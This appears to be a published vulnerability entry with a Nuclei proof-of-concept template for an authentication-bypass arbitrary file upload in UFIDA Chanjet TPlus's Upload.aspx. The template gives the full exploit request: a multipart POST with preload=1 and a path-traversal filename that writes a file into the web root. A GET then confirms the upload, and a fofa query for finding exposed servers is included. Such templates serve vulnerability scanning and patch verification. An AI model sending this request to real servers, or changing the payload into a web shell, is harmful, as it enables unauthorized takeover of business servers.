漏洞描述
There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server.
chanjet-tplus-fileupload: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload
PoC代码[已公开]
id: chanjet-tplus-fileupload
info:
name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload
author: SleepingBag945
severity: high
description: |
There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server.
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT%2B%20Upload.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 2
fofa-query: app="畅捷通-TPlus"
tags: yonyou,chanjet,upload,intrusive,vuln
http:
- raw:
- |
POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuirnbcvo
Accept-Encoding: gzip
------WebKitFormBoundaryuirnbcvo
Content-Disposition: form-data; name="File1"; filename="../../../img/login/{{randstr_1}}.jpg"
Content-Type: image/jpeg
{{randstr_2}}
------WebKitFormBoundaryuirnbcvo--
- |
GET /tplus/img/login/{{randstr_1}}.jpg HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1==200 && status_code_2==200"
- "contains(body_2, '{{randstr_2}}')"
condition: and
# digest: 4b0a00483046022100965465f04fba1599f7b04e81d63cc4b3d36a9e13d38d1e644522a9e93141e32a022100ed7f3c313cd8197fad40e9a3c296349a8a4bcd02359716c953f20dba82010209:922c64590222798bb761d5b6d8e72950